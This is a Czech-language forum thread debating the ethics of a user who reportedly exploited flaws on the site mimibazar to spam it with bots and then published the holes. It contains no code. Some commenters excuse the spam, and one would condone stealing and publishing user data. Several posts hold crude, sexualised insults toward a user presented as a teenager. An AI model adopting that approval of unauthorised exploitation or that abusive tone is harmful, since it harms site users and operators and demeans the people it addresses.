Ale no tak, vždyť se toho tolik nestalo. Podle printscreenů byl spambot aktivní někdy 4.1. blog Gréta zveřejnila až 21.1. večer. Šestnáct dní je dost dlouhá doba na opravy všech zmíněných chyb. Pro člověka, který se nemusí stydět za to že se webařinou živí, počítám tak deset minut na opravu jedné, pro matlala půl hodiny... No, a jestli se provozovatelky k opravám neměly, nebo se je dokonce pokoušely "opravit" nějakou formou nátlaku na naši malou oznamovatelku aby byla zticha a vypadla, bylo zcela na místě chyby zveřejnit. Nepochybuji, že to Gréta myslela dobře a to je pro mne rozhodující, i když forma možná trochu pokulhává za úmyslem ;-)


Ale! Kolik z Vás pohoršených moralistů si dalo tu práci hledat a nahlašovat na mimibazaru chyby? Nebo tady jenom vulgárně nadáváte jediné, která se o to pokusila? A výmluvy druhu "komerční closed-source projekt", "nepoužívám", "co mi je po tom" nežeru. Proč si tedy čtete zápis který má mimibazar v názvu? Opravdu Vám na uživatelích toho bazaru tak záleží, jako třeba právě Grétě? Nebo Vám prostě dělá dobře dirty talk s puberťačkou a nemáte zábrany se do svého fetiše pustit okamžitě jakmile vycítíte byť i nepatrný zlomeček příležitosti využít svoji převahu "autority"? Je opravdu tohle ta správná "zpětná vazba"?

Já bych pouze milou Grétu mírně pokáral za obtěžování uživatelů spambotem, uživatelé jsou prostě třetí strana a není hezké brát si je za rukojmí ve sporu do kterého nevidí, i když je to třeba velká švanda (viz Turingův test :-) ). To ale byla nejspíše od Gréty jenom taková... taková... Prosím Vás, jak se říká klukovině když ji provede holka? A nechci slyšet nic, co začíná na "p"! :-D

Bystroushaak avatar 25.1. 12:50 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Ale no tak, vždyť se toho tolik nestalo. Podle printscreenů byl spambot aktivní někdy 4.1. blog Gréta zveřejnila až 21.1. večer. Šestnáct dní je dost dlouhá doba na opravy všech zmíněných chyb. Pro člověka, který se nemusí stydět za to že se webařinou živí, počítám tak deset minut na opravu jedné, pro matlala půl hodiny... No, a jestli se provozovatelky k opravám neměly, nebo se je dokonce pokoušely "opravit" nějakou formou nátlaku na naši malou oznamovatelku aby byla zticha a vypadla, bylo zcela na místě chyby zveřejnit. Nepochybuji, že to Gréta myslela dobře a to je pro mne rozhodující, i když forma možná trochu pokulhává za úmyslem ;-)
Tady předpokládáš, že všichni jsou programátoři a všichni mají volný čas na to opravovat chyby. Reálně to mohlo stát částku v řádu tisíců až desítek tisíců korun (podle toho kolik si programátor naúčtuje).
Ale! Kolik z Vás pohoršených moralistů si dalo tu práci hledat a nahlašovat na mimibazaru chyby? Nebo tady jenom vulgárně nadáváte jediné, která se o to pokusila? A výmluvy druhu "komerční closed-source projekt", "nepoužívám", "co mi je po tom" nežeru. Proč si tedy čtete zápis který má mimibazar v názvu? Opravdu Vám na uživatelích toho bazaru tak záleží, jako třeba právě Grétě? Nebo Vám prostě dělá dobře dirty talk s puberťačkou a nemáte zábrany se do svého fetiše pustit okamžitě jakmile vycítíte byť i nepatrný zlomeček příležitosti využít svoji převahu "autority"? Je opravdu tohle ta správná "zpětná vazba"?
Představ si, kdyby se tohle stalo irl. Někdo ti autem najede do plotu, nebo ho přeleze a pošlape ti zahradu. A ostatní ti pak řeknou akorát že jsi měl mít silnější plot, nebo ostnatý drát a hlídače, když chceš mít zahradu, to dá přece rozum. Vsadím se, že někde je zloděj, který si to omlouvá tím, že lidi přece mají mít bezpečnostní dveře, co se nedají otevřít lockpickem, když nechtěj aby jim to ostatní vykrádali.

V naší společnosti platí nějaké společenské dohody, mezi které patří například to, že vandalizmus se netoleruje, když je prováděn proti vůli majitele. Jedna věc je najít a nahlásit chybu, druhá obecně security komunitou považovaná za nemorální je jít a tu chybu záměrně zneužít ke spamu a otravování uživatelů. Úplně mimo je pak sepsat o tom blog a ještě se tím chlubit.
Já bych pouze milou Grétu mírně pokáral za obtěžování uživatelů spambotem, uživatelé jsou prostě třetí strana a není hezké brát si je za rukojmí ve sporu do kterého nevidí, i když je to třeba velká švanda (viz Turingův test :-) ). To ale byla nejspíše od Gréty jenom taková... taková... Prosím Vás, jak se říká klukovině když ji provede holka? A nechci slyšet nic, co začíná na "p"! :-D
Je to dětinské. U dětí by se to dalo tolerovat, protože nemají vlastní rozum. U dospělého člověka se většinou očekává, že už má nějaké pochopení akceptovatelného chování.
Jendа avatar 25.1. 16:54 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Tady předpokládáš, že všichni jsou programátoři a všichni mají volný čas na to opravovat chyby. Reálně to mohlo stát částku v řádu tisíců až desítek tisíců korun (podle toho kolik si programátor naúčtuje).
Ale za tohle Gréta jakožto pouhý „posel špatných zpráv“ („máte tam díru“ -- ta tam byla nezávisle na Grétě) nemůže, naopak je dobře, když to někdo nahlásí, než kdyby někdo příštích pět let data tajně tahal (samozřejmě data z mimibazaru nejsou tak zajímavá jako z nějakých firem, bank a úřadů, ale stejně). Tohle mi přijde dobré a taky bych to udělal. Dokonce bych měl i pochopení kdyby si přes tu chybu fakt třeba nějaká data ukradla a třeba dala na internet anonymizovaný wordlist. A taky schvaluji zveřejnění pokud ten, komu chybu reportuješ, na ni kašle, nebo se tě snaží nějak vydírat atd.

Co mě fakt naprosto vadí je to spamování, které navíc tu díru nějak extra nevyužívá - a i kdyby tam dali kapču, tak to nepomůže, protože jsou služby na její vyřešení za pár halířů.
Představ si, kdyby se tohle stalo irl. Někdo ti autem najede do plotu, nebo ho přeleze a pošlape ti zahradu. A ostatní ti pak řeknou akorát že jsi měl mít silnější plot, nebo ostnatý drát a hlídače, když chceš mít zahradu, to dá přece rozum.
Z nějakého důvodu je ve společnosti konsenzus takový [1] [2], že se u fyzických systémů nepožaduje odolnost proti aktivnímu útočníkovi, zatímco u počítačových ano. Taky mě trochu překvapilo, když jsem si to poprvé uvědomil (přečtením toho článku na erratasec), že to tak vlastně mám. Nevím, asi to souvisí se snadností útoku na počítačový systém na internetu, kdy to může udělat masově kdokoli z celého světa, zatímco u fyzických je to složitější?
25.1. 17:24 Radovan
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Možná ten rozdíl bude způsobený tím, že na rozdíl od pasivního plotu se ten počítačový systém může útoku aktivně bránit. Viz http://linuxnext.blogspot.com/2011/06/windows-firewall.html
Jendа avatar 25.1. 17:43 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
1) To není moc rozšířené, omezuje se to maximálně na nějaké IPS, které se snaží zablokovat IP adresu útočníka, což samozřejmě moc nepomůže. Něco co by začlo hackovat zpět jsem ještě neviděl kromě výjimečných bizarností.

2) Plot se taky může bránit, například existují elektrické ploty. Nebo tam může být samopal na rotátoru.

3) Ani v jednom případě to nejspíš nebude příliš legální.
25.1. 18:30 Radovan
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Ona i třísekundová pauza po nepodařeném přihlášení se dá považovat za aktivní obranu.

Naopak ten elektrický plot pouze pasivně čeká až na něj někdo sáhne, a ani pak nedělá nic, na rozdíl od samostřílu, který provede nějakou činnost jen jednou.
26.1. 19:40 trekker.dk | skóre: 71
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Ani v jednom případě to nejspíš nebude příliš legální.

To je právě ten rozdíl. Zákon vám zakazuje ublížit někomu, kdo se aktivně pokouší vniknout na váš pozemek. Respektive teoreticky je to šedá zóna, ale prakticky vám to ohodnotí soud jako nepřiměřenou obranu. Narozdíl od toho počítačový systém se může bránit, aniž by někomu uškodil.

A jinak odolnost proti aktivnímu útočníkovi je vyžadována, pokud například chcete dostat něco z pojistky. Pokud vám něco ukradnou a zjistí se, že útočník nemusel překonávat překážky (např. brána byla otevřená a věc byla za ní), pojišťovna vám dá kulový.
Quando omni flunkus moritati
Jendа avatar 26.1. 23:38 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Narozdíl od toho počítačový systém se může bránit, aniž by někomu uškodil.
Teď jsem si přečetl, že se pod aktivní obranou zdá se myslí i blokování někoho na firewallu… Já si pod tím představil výhradně to čemu se říká hackback. Ale to můžeš v IRL světě dělat taky, třeba ke dveřím do bytu typicky pouštíš jenom ty, co mohou do domu. A stejně jako v počítačovém světě to jde různými způsoby obcházet.
A jinak odolnost proti aktivnímu útočníkovi je vyžadována, pokud například chcete dostat něco z pojistky. Pokud vám něco ukradnou a zjistí se, že útočník nemusel překonávat překážky (např. brána byla otevřená a věc byla za ní), pojišťovna vám dá kulový.
OK, dobrá připomínka, beru na vědomí. Ale tohle není ten případ, který jsem citoval (Někdo ti autem najede do plotu, nebo ho přeleze a pošlape ti zahradu.), že ne?
27.1. 01:14 trekker.dk | skóre: 71
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Ale tohle není ten případ, který jsem citoval

Ne, to není, to bylo jen tak navíc.
Quando omni flunkus moritati
26.1. 19:42 trekker.dk | skóre: 71
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Hlavní problém bych viděl u hned u té částky - tohle by měl vyřešit ten patlal, který ten web udělal, zadarmo jako záruční opravu.
Quando omni flunkus moritati
Jendа avatar 26.1. 23:42 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
XSS - ano. Spamování - jak? Může tam dát lepší captchu, výsledek bude, že útočníka 1000 vyřešení nebude stát dolar, ale dva. Nebo může zavést registraci poštou nebo za vratnou finanční zálohu. To mají všichni strašně rádi.
27.1. 01:11 trekker.dk | skóre: 71
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
XSS - ano. Spamování - jak?

Narážel jsem na to opravování chyb, ochranu před nežádoucími příspěvky už beru jako funkci navíc.
Quando omni flunkus moritati
27.1. 12:43 j
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
To se pletes, u fyzickych systemu se samozrejme odolnost proti aktivnimu utoku ocekava, ty snad nemas doma dvere? A ty dvere nezamykas? Myslis si ze je nejde vykopnout?

Ve skutecnosti jakykoli opatreni ve fyzickym svete muze utocnika tak maximalne zdrzet, a tim ho mozna odradit.

Ale zkus si predstavit (a leckde to muzes i videt v praxi) ze si do baraku postavenyho z papiru das pancerovy dvere. Je stkoro 100% jisty, ze ti nekdo prokopne ten papir uz jen proto, aby ti ukazal jakej ses pitomec.

U elektronickych systemu to funguje uplne stejne, jen ta dira v plote nemusi byt viditelna na prvni ani druhej pohled. Ale kdyz ti o ni nekdo rekne, a ty s tim nic nedelas, tak se prece nemuses divit, ze ti na tu tvoji zahradku vleze, a trebas jen tak pro tu rit prestehuje lavicky na prijezdovou cestu.
Fluttershy, yay! avatar 25.1. 18:19 Fluttershy, yay! | skóre: 85 | blog:
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Reálně to mohlo stát částku v řádu tisíců až desítek tisíců korun (podle toho kolik si programátor naúčtuje).
Víš, co je paradoxní?

Pseudonym Gréta tu od začátku vystupuje s dezinformační agendou a mj. patičkou plnou odkazů na konspirační weby popírající realitu.

A pak začne „vandalizovat“ fórum ze skupiny dezinformačních webů popírajících realitu (CNC uhlobaronů Křetínského a Tkáče).

Jestli to fakt má stát stovky tisíc, z hlediska konsekvencialismu docela úspěšný občanský aktivismus.
25.1. 18:32 Radovan
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Řadíš mezi konspirační weby i CNN a Reuters?
28.1. 13:21 styd se
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
nevim co je horsi - jestli zastrasovat male ditko lzi ze zpusobilo skodu v radu statisicu nebo skutecne mit takove liche povedomi o cene penez
Gréta avatar 4.2. 11:40 Gréta | skóre: 15 | blog: Grétin blogísek | Stockholm
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej

mimibazar z toho jako výde mnohem silnější a mocnější než kdy bejval ;D

Bedňa avatar 25.1. 23:39 Bedňa | skóre: 34 | blog: Žumpa | Horňany
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Někdo ti autem najede do plotu, nebo ho přeleze a pošlape ti zahradu
Zabudol si na ústavu ktorá ti vo všetkých civilizovaných krejinách garantuje súkromné práva a je jasne dané, že sa ti nikto beztrestne nemôže nabúrať do plota a kľudne sa u teba prechádzať. Dúfam, že sa to nijak vďaka dnešnej online dobe nijak meniť nebude.

V momente ako opustíš túto bezpečnú zónu si vystavený len zákonom z dielne parlamentu a ktoré väčšinou stoja za prd.

Mať dnes stránku kde sa dá vložiť JavaScript tak to je ako parkovať pred Tescom s kľúčkmi v spínačke.

Nie nemám s nimi žiadny súcit, stačí pred výstup pstaviť frontend ktorý všetko premení na plain text a nech tam hocikto vloží skript tak to bude vidieť ako plaintext. Ak chce niekto za toto tisíce, tak fajn, ja som také šťastie nemal.

KERNEL ULTRAS video channel >>>
Bystroushaak avatar 26.1. 00:35 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Zabudol si na ústavu ktorá ti vo všetkých civilizovaných krejinách garantuje súkromné práva a je jasne dané, že sa ti nikto beztrestne nemôže nabúrať do plota a kľudne sa u teba prechádzať. Dúfam, že sa to nijak vďaka dnešnej online dobe nijak meniť nebude.
Pokud z ústavy odvozuješ práva k plotu, tak stejně dobře můžeš odvodit práva k webu. Co se týče zákonů, tak ty myslí na oboje.
Nie nemám s nimi žiadny súcit, stačí pred výstup pstaviť frontend ktorý všetko premení na plain text a nech tam hocikto vloží skript tak to bude vidieť ako plaintext. Ak chce niekto za toto tisíce, tak fajn, ja som také šťastie nemal.
A až ti někdo vypwní skrz nějaký bug tvůj web, tak to bude taky určitě v pohodě, co? Narážím tu na to, že úplně všechno jde vandalizovat. Z hlavy mě napadají desítky způsobů, jak to strhnout na hromádku cihel i tady. Kdybych se trochu snažil, tak to tu můžu udělat naprosto nepoužitelné pro všechny. To ti přijde taky ok? Je tu minimálně několik chyb neošetřeného vstupu, jak se kdysi ukázalo s kauzou toho trotla co chtěl aby mu smazali blog, tak tím spamoval poradnu.

Mimo neošetřených vstupů tu můžu přetěžovat jednotlivé funkcionality, takže například nepůjdou použít, protože server bude vytížen. Vím tu o minimálně jednom deadlocku, který znemožňuje funkcionalitu. Můžu napsat několik botů, které to tu budou tak zasírat že prostě přes noc dojde místo na disku. Můžu útočit na hesla ostatních, a nebo i na správce, skrz celou paletu útoků. Četl jsi zdrojáky abclinuxu? Kolik věcí tu má komplexitu O(n^2) a je ovlivnitelná uživatelskými vstupy? To ani nepočítám sociální útoky, kde jde prostě otravovat život lidem různými boty, kteří se budou tvářit jako legitimní uživatelé a chovat jako idioti.

Kde máš tu hranici, kdy je to pro tebe ještě ok a kdy už ne? Proč jí máš zrovna tam? Není to alibismus? XSS ti vadí, protože by mělo být ošetřeno. Co všechno dalšího ti vadí a nebo nevadí, protože tohle jde škálovat do nekonečna a v podstatě považovat po lidech aby vytvářeli dokonalé systémy. Proč to chceš ve virtuálním světě, když v tom reálném je každému jasné, že to z principu nejde?
Bedňa avatar 26.1. 01:09 Bedňa | skóre: 34 | blog: Žumpa | Horňany
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Reálny priestor je chránený ústavou a to je dobre. Je dobre že je ústava napísaná tak aby ju žiadny právnik nemohol ohýbať. Hocijaké rozširovanie by práve pridalo bugy pre právnikov.
Pokud z ústavy odvozuješ práva k plotu, tak stejně dobře můžeš odvodit práva k webu. Co se týče zákonů, tak ty myslí na oboje.
To je auto s kľúčikmi v spínačke pred Tescom, nikto ťa tam nenútil ísť, je to tvoja voľba.
A až ti někdo vypwní skrz nějaký bug tvůj web..............
Maximálne zožere RAMku a bude nedostupný.

Ochrana užívateľov a čiže aj webu je úplne triviálna. Nejaký nástrel som písal aj tu v blogu.

Ako som písal, prv než niečo vyleze z webu, tak stačí triviálny frontend ktorý všetko vypľuje ak plain text.

Keď chcem robiť niečo čomu nerozumiem, tak musím očakávať problémy, to k tomu neoddeliteľne patrí.
KERNEL ULTRAS video channel >>>
29.1. 08:59 SKK
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
"Je dobre že je ústava napísaná tak aby ju žiadny právnik nemohol ohýbať." a čítal si vôbec niekedy tú našu ústavu?

ohýbať sa dá tak krásne, že až!... zober si len takú druhú hlavu... základné práva a slobody... keby sa nedala ohýbať, asi by napr. malo byť jasné, komu je upierané jeho základné právo... či takému Dobrovodskému, alebo Tukabelom, čo si v susednom dvore zriadili osadu;-)... alebo sloboda názoru, slova... tá platí len pre tých, ktorí sú ideologicky kompatibilní s mienkotvorcami... alebo robia v Levoči komparz kiskoidom
Bedňa avatar 30.1. 00:17 Bedňa | skóre: 34 | blog: Žumpa | Horňany
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Dobrý sused je šťastie, tu nie je čo viac dodať.
KERNEL ULTRAS video channel >>>
26.1. 20:39 BLEK.ův bratranec
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej

Mne hlavně trápilo jakým hrubým způsobem jste jí to napsali, především když nevznikla vůbec žádná patrná škoda. Navíc, jen těžko můžeš někoho kárat za nevhodné chování, když sám máš máslo na hlavě.


Reálně to mohlo stát částku v řádu tisíců až desítek tisíců korun (podle toho kolik si programátor naúčtuje).


Kdo chce vydělávat, musí chtít i investovat, tak jednoduše to prostě chodí. No, a kdyby měli hluboko do kapsy tak se tam přinejmenším motala Gréta, třeba její potenciál šlo lépe využít, než si z ní udělat škodnou. Ale hlavně - jestli toto má být konečná podoba nových stránek, tak bych to viděl spíše na reklamaci, podobně jako trekker.
Reklamace by nestála nic, Gréta hádám omluvu a možná ještě pár vyřešených domácích úkolů na češtinu navrch ;-)

Představ si, kdyby se tohle stalo irl

Stávat se to in real life tak mám obden poštovní schránku plnou reklamních letáků. Počkat, vlastně mám!

Vzato relativně k tomu, co všechno s tím bazarem mohla Gréta udělat to žádný vandalismus nebyl, navíc když zohledníš její přínos v hlášení chyb. Pravý Vandal by se rozhodně takto nechoval, za ním by z mimibazaru zbylo pouze spáleniště a moře slz zoufalých uživatelek :-D Takovou moc měla milá Gréta v rukou a jak s ní naložila? Spamovala v diskuzích recept na sněhové pusinky. To není destruktivní chování.

A napadlo tě, že se určitého vandalismu možná dopouštíš právě teď i ty? Nelze se automaticky spolehnout na to, že si Gréta z tvých příspěvků vezme "Jéje, moudrý Bytroušák má pravdu! Už to nikdy neudělám", může to totiž klidně mít zcela opačný efekt. V lepším případě příště kolem nalezené chyby jen tak projde, protože pomáhat se přeci nevyplácí, a už vůbec ne sprosťákům a suchoprdům z okolí FOSS, v horším případě si z toho dokonce může vzít "Když mě všichni mají za p***, tak se tak budu i chovat". A kus zodpovědnosti budeš mít i ty! :-)

Je to dětinské

Ano, bylo to takové roztomilé :-). Jestli bych byl zodpovědný za takto děravé stránky aukčního serveru a přitom IT technologiím absolutně nerozuměl, byl bych za hlášení a popis chyb ochotný klidně zaplatit stejnou cenu jako mimibazar a stát se další obětí otřesného "pusinkového útoku". Ale dětinské mi spíše připadá hojit si na Grétě nabubřelé ego, každý nějak začínal a dělal chyby, nebuď zbytečně zlý, z toho nikdy nemůže vzejít nic dobrého.

Bystroushaak avatar 26.1. 21:32 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Mne hlavně trápilo jakým hrubým způsobem jste jí to napsali, především když nevznikla vůbec žádná patrná škoda.
Hrubým způsobem jí to napsal Jenda, tak nás laskavě neházej do jednoho pytle. Jinak mi přijde zábavné, jak se v tobě probouzí protektivita jen na základě toho že někdo použije ženský avatar. Možná by sis jí měl substituovat s tlustým čtyřicátníkem, pak by se ti třeba zmenšilo emoční zkreslení. Je ti jasné, že to není skutečná Gréta, že je to jen falešný humorný profil? Není z poolu potenciálních samic, nezaslouží si tvojí podvědomou protekci. Zcela účelově tě zneužívá. Lepší?

Když nad tím tak přemýšlím, tak nějak lituji, že tu nemám profil jako holka, tohle je dobrý psychologický hack.
Navíc, jen těžko můžeš někoho kárat za nevhodné chování, když sám máš máslo na hlavě.
Máslo na hlavě za destruktivní chování fakt nemám. Pokud myslíš ten trackovací pixel tady, tak o tom jsem mluvil zcela veřejně od samého začátku (doslova to celé vzniklo na základě místní diskuze o tom, jak je těžké trackovat uživatele, kam jsem psal že není, že se to dá dělat pixelem a může to dělat kdokoliv z uživatelů abclinuxu) a funkčnost to nikomu neomezilo.
Stávat se to in real life tak mám obden poštovní schránku plnou reklamních letáků. Počkat, vlastně mám!

Vzato relativně k tomu, co všechno s tím bazarem mohla Gréta udělat to žádný vandalismus nebyl, navíc když zohledníš její přínos v hlášení chyb. Pravý Vandal by se rozhodně takto nechoval, za ním by z mimibazaru zbylo pouze spáleniště a moře slz zoufalých uživatelek :-D Takovou moc měla milá Gréta v rukou a jak s ní naložila? Spamovala v diskuzích recept na sněhové pusinky. To není destruktivní chování.
Security komunita má poměrně jasně daný kodex chování. Tam například patří, že je ok hledat chyby a reportovat je, ale není ok spamovat, nebo ničit funkčnost stránky. V případě že nereagují, tak je v pohodě zveřejnit článek o chybě, i když ideálně s ne úplně kompletními informacemi, aby člověk předešel tomu že to budou zneužívat script kiddies.
Ano, bylo to takové roztomilé :-). Jestli bych byl zodpovědný za takto děravé stránky aukčního serveru a přitom IT technologiím absolutně nerozuměl, byl bych za hlášení a popis chyb ochotný klidně zaplatit stejnou cenu jako mimibazar a stát se další obětí otřesného "pusinkového útoku". Ale dětinské mi spíše připadá hojit si na Grétě nabubřelé ego, každý nějak začínal a dělal chyby, nebuď zbytečně zlý, z toho nikdy nemůže vzejít nic dobrého.
Wtf? Můžeš mi prosímtě vysvětlit co je na odsouzení útoku na webové stránky za nabubřelé ego? Upřímně mě to zajímá. Přijde mi to jako prázdné kecy, když to nepodložíš žádnou další argumentací a používáš to v podstatě jen jako urážku.

Jinak roztomilé ti to přijde, jen protože tohle nebylo cíleno na tebe. Osobně doufám, že tohle budeš mít na paměti, až se tohle stane i tobě a budeš mít stejnou benevolenci. Například až ti někdo sundá stránky které používáš k podnikání. Nebo ti nějaký ransomware sežere disk.

Fakt je, že děravé je úplně všechno. Veškerý software co používáme obsahuje chyby a chyby neošetřeného vstupu jsou vůbec ty nejčastější. Kde chceš nakreslit hranici? Stačí ti u XSS? Nebo u SQLi? Buffer overflow? Co takhle timing, a nebo obecně side-channel útoky? Například celý internet stojí jen na důvěře a je triviální ho likvidovat. Budeš se taky tvářit jako že to bylo roztomilé, až zase někdo vyexportuje vadné BGP (se sněhovýma pusinkama) a vypne ti net na půl dne?
26.1. 23:31 BLEK.ův bratranec
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej

Hrubým způsobem jí to napsal Jenda, tak nás laskavě neházej do jednoho pytle. Jinak mi přijde zábavné, jak se v tobě probouzí protektivita jen na základě toho že někdo použije ženský avatar.

Ano, hrubým způsobem jí to napsal Jenda, tys na to neměl kuráž a tak jsi pouze neupřímně přitakával jaká je to prospěšná zpětná vazba. Milá Gréta má určitě za sebou v závěsu administrátorky z mimibazaru, přece si nezredukuješ pool potenciálních samic nějakým přisprostlým dirty talkem ;-)
Vážně jsi tak mimořádně nadaný empatik, že si myslíš že považuji naši Grétu za tu Grétu? Nevím o ní nic, může to být Amiga, může to být skutečná puberťačka a dokonce to můžeš být i ty ("Se mi líbí...")!
Možná tě ten projekt už vyčerpával, možná jsi udělal nějakou chybu při útoku na mimibazar a teď se toho profilu potřebuješ zbavit a tak jsi vymyslel tuto veřejnou popravu. Už jenom jak tady lituješ že nemáš holčičí krycí identitu :-D

Ale dejme tomu, že Gréta je skutečně nějaký(á) pubertální script kiddie. Pokud k ní tak budeme přistupovat, tak nejhorší možný scénář je, že Amigovi (nebo tobě) v rozkroku tepláků naroste boule. To nezní tak hrozně, ne?

 

Security komunita má poměrně jasně daný kodex chování. Tam například patří, že je ok hledat chyby a reportovat je, ale není ok spamovat, nebo ničit funkčnost stránky. V případě že nereagují, tak je v pohodě zveřejnit článek o chybě, i když ideálně s ne úplně kompletními informacemi, aby člověk předešel tomu že to budou zneužívat script kiddies.

Mám dojem, že vše vyjma spamu Gréta splnila.

 

když to nepodložíš žádnou další argumentací a používáš to v podstatě jen jako urážku

Jedním z projevů nabubřelého ega je, že se nabubří hned jak na jeho nabubřelost upozorníš ;-)

 

Kde chceš nakreslit hranici?

Možná nevím, kde by taková hranice měla být, rozhodně ale věřím, že Grétin "pusinkový útok" je ještě přijatelný. Absolutně nic se nestalo a ty si s dětinskou tvrdohlavostí trváš na svém jakou naše Gréta způsobila hroznou katastrofu. Měl bys přijmout holá fakta a naší milé Grétě se pořádně omluvit :-)

Jendа avatar 26.1. 23:54 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Možná nevím, kde by taková hranice měla být, rozhodně ale věřím, že Grétin "pusinkový útok" je ještě přijatelný. Absolutně nic se nestalo
Já tím jak mimibazar neznám a útok jsem neviděl, tak možná úplně nechápu, co se stalo, ale představuju si to jako kdyby sem někdo začal vkládat do všech aktuálních vláken stovky/tisíce spamových komentářů. Je to tak? Je to OK?
Mám dojem, že vše vyjma spamu Gréta splnila.
No vždyť přesně o to alespoň mně jde.
27.1. 01:09 BLEK.ův bratranec
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej

Podle zdrojového kódu jeden "Grétobot" odeslal do náhodných diskuzních vláken 10 nových komentářů a 50 reakcí, tedy 60 za každého robota. No,a když si vyhledáš všechny inzerenty s přezdívkou začínající na "gretobot", tak jich to vyplivne pouze 24, žádná velká armáda robotů se patrně nekonala :-D. A z toho vychází celková suma spamových komentářů 60*24=1440. U těch profilů je vidět časový údaj poslední aktivity a z toho lze vyvodit že celý útok trval cca jednu hodinu mezi 11:50 a 12:50 v pátek 3.1. Předpokládám, že 24 účtů může ještě celkem snadno zablokovat administrátor ručně v nějakém grafickém rozhraní. Ano, nebylo to moc hezké ale jako útok si to představuji jinak. Pochopitelně nelze vyloučit že by ty své skripty nepozměnila, než je zde zveřejnila.

29.1. 08:56 ^
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
A má to grafické rozhraní i tlačítko na odstranění všech komentářů autora? Zaspamovat někomu web půl druhým tisícem komentářů může jen píčus s půlkou mozku. Neukazuje to na žádnou konkrétní zranitelnost a co hůř, zabránit se tomu uspokojivě nedá. Pojďme všude vyplňovat kreditky, telefonní čísla a captchy (to je AND, ne OR), protože bez toho nás nějaký script kiddie s přebytkem hormonů tvrdě vyškolí.

Taky máš zabezpečenou poštovní schránku, aby do ní nešel rvát použitej toaleťák a mrtvý krysy? Co otevřené okno? Proletí cihla? Hovno? Biologické zbraně ustojíš? Nosíš všude chrániče sluchu? Chráníš si zrak před případným útokem laserem? Dáváš pozor, jestli pisoár není pod proudem a neshoří ti šulin? Děláš chemický rozbor všeho co žereš?

Jako sladký bonus na to nesmyslné, destruktivní spamování použil/a Tor, protože proč nevytížit pár exit nodů a nerozšířit seznam služeb, které ho mají na blacklistu.

Upřímně, taky se občas pohybuji na hraně, ale takovéhle píčoviny jsem nedělal ani v 15.
30.1. 14:57 BLEK.ův bratranec
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej

Těch 1440 je maximální možná suma odeslaných komentářů, to ještě neznamená že by jich tam najednou reálně tolik bylo. Gréta dokonce psala že použitých robotů bylo "jenom pár", jestli to v záplavě smutných smajlíků dokážeš přečíst.
Zdá se, že situaci vnímáš horší než doopravdy je, dokonce to lze početně dokázat: půl druhého tisíce je o šedesát více než 1440. Samotné se to může zdát jako nepodstatný detail, ale když si k tomu přidáš nadužívání vulgarismů, sestavovní hypotetických paranoidních scénářů a zjevné sadistické tendence... Nejprve si zameť na vlastním prahu, až pak se pouštěj do druhých. Jinak ti lze jen težko věřit že se nesnažíš ze sebe ventilovat jen a pouze své vlastní problémy. Všechna ta anonymizace ti bude k ničemu když budeš v afektu pouštět náhodné kolemjdoucí hluboko do nitra své duše ;-)  

Naší milé Grétě bylo navařeno už tolik dršťkové polévky, že se zde celý týden neobjevila. Vážně něčemu pomůže, když do hrnce ještě navrch přihodíš tu svoji půlku mozku? Třeba Gréta od nás dávno utekla, třeba se právě teď někde mstí světu a znovu na to používá tor... A třeba pouze proto, že si nepřečetla tvoji jinak přínosnou technickou poznámku, bohužel utopenou v hrubostech a sprostotách. Za to by pochopitelně mohl jen a pouze tento tvůj druh přístupu, jaký jsme už v této diskuzi v mnoha komentářích již mohli vidět, že. Byla by škoda Grétu ztratit kvůli pouhému jedinému drobnému přešlapu na nějakém mimibazaru.



Upřímně, taky se občas pohybuji na hraně, ale takovéhle píčoviny jsem nedělal ani v 15.

Tak s Bystroušákem máme problém takovou hranici přesně vytyčit, já si dokonce myslím že to ani není možné. Třeba jsi ji i ty někdy překročil a ani o tom nevíš. A být z toho malér, tak by se ti možná hodil někdo kdo by se tě zastal, určitě bys mu nechtěl pálit šulína :-D BTW, Na takový pisoár bych nerad narazil, bral bych raději "pusinkový útok" na server ;-)

Bystroushaak avatar 27.1. 01:45 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
